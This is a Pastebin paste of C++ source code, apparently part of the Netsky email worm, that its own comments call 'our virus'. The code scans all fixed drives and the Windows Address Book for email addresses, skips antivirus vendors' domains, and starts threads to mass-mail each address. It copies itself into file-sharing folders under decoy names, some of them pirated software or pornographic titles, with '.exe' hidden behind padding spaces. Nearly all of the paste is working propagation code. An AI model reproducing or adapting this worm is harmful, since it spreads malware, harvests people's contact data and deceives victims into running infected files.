API tools faq
paste
FlyFar

Harvester.cpp

FlyFar
Mar 26th, 2024
64
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 10.06 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #include <stdio.h>  
  2. #include <windows.h>
  3. #include "mailer.h"
  4.  
  5.  
  6. void massmail_it(char *address)
  7. {
  8.  
  9.     static const char *list[] = {
  10.          "@symantec", "@panda", "@avp", "@microsoft",  
  11.          "@msn", "@sopho", "@mm", "@norman", "@norton", "@noreply", "@virusli", "@fsecure",
  12.         "@hotmail", NULL, "\n\n\n" };
  13.    
  14.  
  15.     register int m;
  16.  
  17.     for (m=0; list[m]; m++)
  18.         if (strstr(address, list[m])) return; //mail filter
  19.       if(!strstr(address,".")) return;
  20.  
  21.  
  22.     DWORD tid;
  23.  
  24. CreateThread(0, 0, mail_it, (char *)address, 0, &tid);
  25. return;
  26.  
  27.    
  28.  
  29. }
  30.  
  31. // Opens the file, scans to the end of the file looking for @ sign
  32. // if one is found it backs up to the beginning of addresss
  33. // and grabs the from beginning to end, harvests it then
  34. // passes it through massmail_it
  35. int harvest_textfile(const char *text_file)
  36. {
  37.    
  38. FILE *fp;  
  39. long byte_count = 0L;
  40. long at_count = 0L;
  41. char collected[200];
  42.  
  43.   int ch;
  44.   long fpos = 0L;
  45.   int idx;
  46.  
  47.   if ( (fp = fopen(text_file, "rb")) == NULL) {
  48.    
  49.     return 0;
  50.   }
  51.  
  52.   while ((ch = fgetc(fp)) != EOF) {
  53.     if (ch == '@') at_count++;  
  54.     byte_count++;
  55.   }
  56.   fclose(fp);
  57.  
  58.  
  59.   if ( (fp = fopen(text_file, "rb")) == NULL) {
  60.     return 0;
  61.   }
  62.  
  63.  
  64.   int valid = 0;
  65.   while ((ch = fgetc(fp)) != EOF && (fpos <= byte_count)) {
  66.     if (ch == '@') {
  67.       at_count++;    
  68.    
  69.       fpos = ftell(fp) - 1L;
  70.  
  71.       if (fpos >= 1L) fpos--;
  72.       fseek(fp, fpos, 0);  
  73.       ch = fgetc(fp);
  74.  
  75.       while (  (ch >= 'a' && ch <= 'z') ||
  76.                (ch >= 'A' && ch <= 'Z') ||
  77.                (ch >= '0' && ch <= '9') ||
  78.                (ch == '_' || ch == '-'  || ch == '.') ) {
  79.              
  80.         if (fpos == 0) {
  81.           rewind(fp);
  82.           break;
  83.         }
  84.         else {
  85.           fpos--;  
  86.           fseek(fp, fpos, 0);  
  87.           ch = fgetc(fp);
  88.         }      
  89.         if (ch == EOF) fclose(fp);
  90.       }            
  91.  
  92.  
  93.       idx = 0;
  94.  
  95.       while ( (ch = fgetc(fp)) != EOF) {  
  96.         valid = 0;
  97.         if (ch >= 'a' && ch <= 'z') valid = 1;
  98.         if (ch >= 'A' && ch <= 'Z') valid = 1;
  99.         if (ch >= '0' && ch <= '9') valid = 1;
  100.         if (ch == '_' || ch == '-') valid = 1;
  101.         if (ch == '@' || ch == '.') valid = 1;
  102.        
  103.        
  104.         if (!valid) break;
  105.      
  106.         collected[idx] = ch;      
  107.         idx++;
  108.        
  109.       }        
  110.       collected[idx] = '\0';
  111.  
  112.      
  113.       massmail_it(collected);
  114.     }      
  115.   }
  116.   fclose(fp);
  117.   return 0;
  118. }
  119.  
  120. //Harvests email addresses out of windows address book
  121.  
  122. /**********************************************
  123. *
  124. *
  125. * Synopsis on Wab address collection:
  126. * Our virus first finds the location of WAB from the registry.
  127. * Create the file mapping. Begin finding email IDs
  128. * File format of WAB is easy to understand
  129. * The number of addresses are stored at the memory location 0x64 and the starting address
  130. * of email addresses are stored at memory location 0x60 .
  131. * Once our virus finds the email addresses the virus Unmaps the mapped WAB file
  132. * by calling UnmapViewOfFile API, then close all opened handles.
  133. *
  134. *
  135. *
  136. **********************************************/
  137. int harvest_wab()
  138. {
  139.     HANDLE fhandle1;
  140.     BYTE pathw[MAX_PATH];
  141.     DWORD sz;
  142.     HKEY hkeyresult;
  143.     sz=800;
  144.     RegOpenKeyEx(HKEY_CURRENT_USER, (LPCTSTR)"Software\\Microsoft\\WAB\\WAB4\\Wab File Name" , 0,KEY_ALL_ACCESS, &hkeyresult );
  145.     RegQueryValueEx (hkeyresult, (LPCTSTR)"",0,0, pathw, &sz ) ;
  146.     RegCloseKey(hkeyresult);
  147.  
  148.     fhandle1 = CreateFile ((char *)pathw,GENERIC_READ,FILE_SHARE_READ,
  149.                           NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  150.     char *buffer=NULL;
  151.     HANDLE fhandle2=CreateFileMapping(fhandle1,0,PAGE_READONLY,0,0,0);
  152.     if(!fhandle2) {
  153.         CloseHandle(fhandle1);
  154.         return 0;
  155.     }
  156.     buffer=(char *)MapViewOfFile(fhandle2,FILE_MAP_READ,0,0,0);
  157.     if(!buffer) {
  158.         CloseHandle(fhandle2);
  159.         CloseHandle(fhandle1);
  160.         return 0;
  161.     }
  162.  
  163.     int bld;
  164.     bld=int(*(buffer+0x64));
  165.     DWORD add=MAKELONG(MAKEWORD(*(buffer+0x60),*(buffer+0x61)),
  166.                                 MAKEWORD(*(buffer+0x62),*(buffer+0x63)));
  167.     char addressOne[300];
  168.     int ii,j=0;
  169.     int len;
  170.     for (len=0;len<(bld*68);len+=68){
  171.         for (ii=0;ii<=68;ii++)
  172.         {
  173.             addressOne[ii]=*(buffer+add+j+len);
  174.             j+=2;
  175.         }
  176.         addressOne[68]='\0';j=0;
  177.  
  178. massmail_it(addressOne);
  179.        
  180.     }
  181.     CloseHandle (fhandle1);    
  182.     UnmapViewOfFile(buffer);
  183.     CloseHandle (fhandle2);    
  184.  
  185.     return 0;
  186. }
  187.  
  188. char pathname[256];
  189.  
  190. void copy_to(char *p2p)
  191. {
  192.  
  193. char pathname[256];
  194. char p2p2[MAX_PATH];
  195. char p2p3[MAX_PATH];
  196. char p2p4[MAX_PATH];
  197. char p2p5[MAX_PATH];
  198. char p2p6[MAX_PATH];
  199. char p2p7[MAX_PATH];
  200. char p2p8[MAX_PATH];
  201. char p2p9[MAX_PATH];
  202. char p2p10[MAX_PATH];
  203. char p2p11[MAX_PATH];
  204. char p2p12[MAX_PATH];
  205. char p2p13[MAX_PATH];
  206. char p2p14[MAX_PATH];
  207. char p2p15[MAX_PATH];
  208. char p2p16[MAX_PATH];
  209. char p2p17[MAX_PATH];
  210. char p2p18[MAX_PATH];
  211. char p2p19[MAX_PATH];
  212. char p2p20[MAX_PATH];
  213.  
  214.  
  215.  
  216. HMODULE hMe = GetModuleHandle(NULL);
  217. DWORD nRet = GetModuleFileName(hMe, pathname, 256);
  218. strcat(p2p2, p2p);
  219. strcat(p2p3, p2p);
  220. strcat(p2p4, p2p);
  221. strcat(p2p5, p2p);
  222. strcat(p2p6, p2p);
  223. strcat(p2p7, p2p);
  224. strcat(p2p8, p2p);
  225. strcat(p2p9, p2p);
  226. strcat(p2p10, p2p);
  227. strcat(p2p11, p2p);
  228. strcat(p2p12, p2p);
  229. strcat(p2p13, p2p);
  230. strcat(p2p14, p2p);
  231. strcat(p2p15, p2p);
  232. strcat(p2p16, p2p);
  233. strcat(p2p17, p2p);
  234. strcat(p2p18, p2p);
  235. strcat(p2p19, p2p);
  236. strcat(p2p20, p2p);
  237.  
  238.  
  239. strcat(p2p, "\\ACDSEE10.exe");
  240. strcat(p2p2, "\\Adobe Photoshop Full Version.exe");
  241. strcat(p2p3, "\\Cisco source code.zip                       .exe");
  242. strcat(p2p4, "\\WinAmp 6.exe");
  243. strcat(p2p5, "\\WinRAR.exe");
  244. strcat(p2p6, "\\Windows Longhorn Beta.exe");
  245. strcat(p2p7, "\\WINDOWS SOURCE CODE.zip                            .exe");
  246. strcat(p2p8, "\\jenna jameson screensaver.scr");
  247. strcat(p2p9, "\\Opera Registered version.exe");
  248. strcat(p2p10, "\\Snood new version.exe");
  249. strcat(p2p11, "\\Brianna banks and jenna jameson.mpeg                        .exe");
  250. strcat(p2p12, "\\Norton AntiVirus 2004.exe");
  251. strcat(p2p13, "\\Battlefield 1942.exe");
  252. strcat(p2p14, "\\NETSKY SOURCE CODE.zip                                   .exe");
  253. strcat(p2p15, "\\Kazaa Lite.zip                                  .exe");
  254. strcat(p2p16, "\\Windows crack.zip                                              .exe");
  255. strcat(p2p17, "\\Teen Porn.mpeg                                             .exe");
  256. strcat(p2p18, "\\Britney spears naked.jpeg                                           .exe");
  257. strcat(p2p19, "\\DVD Xcopy xpress.exe");
  258. strcat(p2p20, "\\Visual Studio.NET.zip                                                   .exe");
  259.  
  260.  
  261.  
  262. CopyFile(pathname,p2p,0);
  263. CopyFile(pathname,p2p2,0);
  264. CopyFile(pathname,p2p3,0);
  265. CopyFile(pathname,p2p4,0);
  266. CopyFile(pathname,p2p5,0);
  267. CopyFile(pathname,p2p6,0);
  268. CopyFile(pathname,p2p7,0);
  269. CopyFile(pathname,p2p8,0);
  270. CopyFile(pathname,p2p9,0);
  271. CopyFile(pathname,p2p10,0);
  272. CopyFile(pathname,p2p11,0);
  273. CopyFile(pathname,p2p12,0);
  274. CopyFile(pathname,p2p13,0);
  275. CopyFile(pathname,p2p14,0);
  276. CopyFile(pathname,p2p15,0);
  277. CopyFile(pathname,p2p16,0);
  278. CopyFile(pathname,p2p17,0);
  279. CopyFile(pathname,p2p18,0);
  280. CopyFile(pathname,p2p19,0);
  281. CopyFile(pathname,p2p20,0);
  282.  
  283.  
  284.  
  285. }
  286. //copy to folders containing "shar"
  287. void p2p_in(char *path)
  288. {
  289. CharLower(path);
  290.     if (strstr(path,"shar")) {
  291.         copy_to(path);
  292.     }
  293.     else {
  294.         return;
  295. }
  296.  
  297. }
  298.  
  299. void harvest_extensions(const char *destination, WIN32_FIND_DATA *finder)
  300. {
  301.     char Extension[MAX_PATH];
  302.     int e, o;
  303.  
  304.     for (e=0,o=-1; finder->cFileName[e] && (e < 255); e++)
  305.         if (finder->cFileName[e] == '.') o=e;
  306.  
  307.     if (o < 0) {
  308.         Extension[0] = 0;
  309.     } else {
  310.         lstrcpyn(Extension, finder->cFileName+o+1, sizeof(Extension)-1);
  311.         CharLower(Extension);
  312.     }
  313.  
  314.     do {
  315.        
  316. e = 1;             
  317.  
  318.  
  319. if (lstrcmp(Extension, "html") == 0) break;
  320. if (lstrcmp(Extension, "htm") == 0) break;
  321. if (lstrcmp(Extension, "txt") == 0) break;
  322. if (lstrcmp(Extension, "xml") == 0) break;
  323. if (lstrcmp(Extension, "doc") == 0) break;
  324. if (lstrcmp(Extension, "rtf") == 0) break;
  325. if (lstrcmp(Extension, "jsp") == 0) break;
  326. if (lstrcmp(Extension, "asp") == 0) break;
  327. if (lstrcmp(Extension, "jsp") == 0) break;
  328. if (lstrcmp(Extension, "adb") == 0) break;
  329. if (lstrcmp(Extension, "dbx") == 0) break;
  330.        
  331.  
  332. e = 0;             
  333.        
  334.  
  335. if (Extension[0] == 0)
  336.            
  337.  
  338.    
  339. e = 0;
  340.         return;
  341.     }
  342.    
  343.     while (0);
  344.    
  345.     if (e == 1) {
  346.         harvest_textfile(destination);
  347.     }
  348.    
  349. }
  350.  
  351.  
  352.  
  353. int recursive(const char *path, int max_level)
  354. {
  355.     char buffer[280];
  356.     WIN32_FIND_DATA data;
  357.     HANDLE finder;
  358.    
  359.  
  360.     if ((max_level <= 0) || (path == NULL)) return 1;
  361.     if (path[0] == 0) return 1;
  362.  
  363.     strcpy(buffer, path);
  364.     if (buffer[strlen(buffer)-1] != '\\') strcat(buffer, "\\");
  365.     strcat(buffer, "*.*");
  366.  
  367.     memset(&data, 0, sizeof(data));
  368.  
  369.     for (finder=0;;)
  370.     {
  371.         if (finder == 0)
  372.        
  373.         {
  374.             finder = FindFirstFile(buffer, &data);
  375.             if (finder == INVALID_HANDLE_VALUE) finder = 0;
  376.             if (finder == 0)
  377.                 break;
  378.         }
  379.         else
  380.         {
  381.             if (FindNextFile(finder, &data) == 0) break;
  382.         }
  383.  
  384.         if (data.cFileName[0] == '.')
  385.  
  386.         {
  387.             if (data.cFileName[1] == 0)
  388.                 continue;
  389.             if (data.cFileName[1] == '.')
  390.  
  391.                 if (data.cFileName[2] == 0)
  392.                    
  393.                     continue;
  394.         }
  395.  
  396.         lstrcpy(buffer, path);
  397.         if (buffer[strlen(buffer)-1] != '\\') strcat(buffer, "\\");
  398.         strcat(buffer, data.cFileName);
  399.  
  400.         if ((data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY) {
  401.             recursive(buffer, max_level-1 );
  402.             p2p_in(buffer); //copy to folders containing "shar"
  403.  
  404.         }
  405.        
  406.         else
  407.             harvest_extensions(buffer,&data);
  408.        
  409.     }
  410.  
  411.     if (finder != 0) FindClose(finder);
  412.  
  413.     return 0;
  414. }
  415.  
  416.  
  417.  
  418. void harvest_disks()
  419. {
  420.     char buffer[MAX_PATH], sysdisk;
  421.  
  422.     memset(buffer, 0, sizeof(buffer));
  423.  
  424.     sysdisk = buffer[0];
  425.  
  426.     strcpy(buffer+1, ":\\");
  427.  
  428.     for (buffer [0] = 'C' ; buffer [0] <'Y'; buffer[0]++)
  429.    
  430.     {
  431.         if (buffer[0] == sysdisk) continue;
  432.         switch (GetDriveType(buffer)) {
  433.             case DRIVE_FIXED:
  434.             case DRIVE_RAMDISK:
  435.                 break;
  436.  
  437.             default:
  438.  
  439.                 continue;
  440.         }
  441.         Sleep(3000);
  442.         recursive(buffer, 15);
  443.     }
  444. }
  445.  
  446.  
  447. void harvest_main()
  448. {
  449.    
  450.         harvest_wab();
  451.         harvest_disks();
  452.    
  453. }
  454.  
Tags: source code worm netsky email worm
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!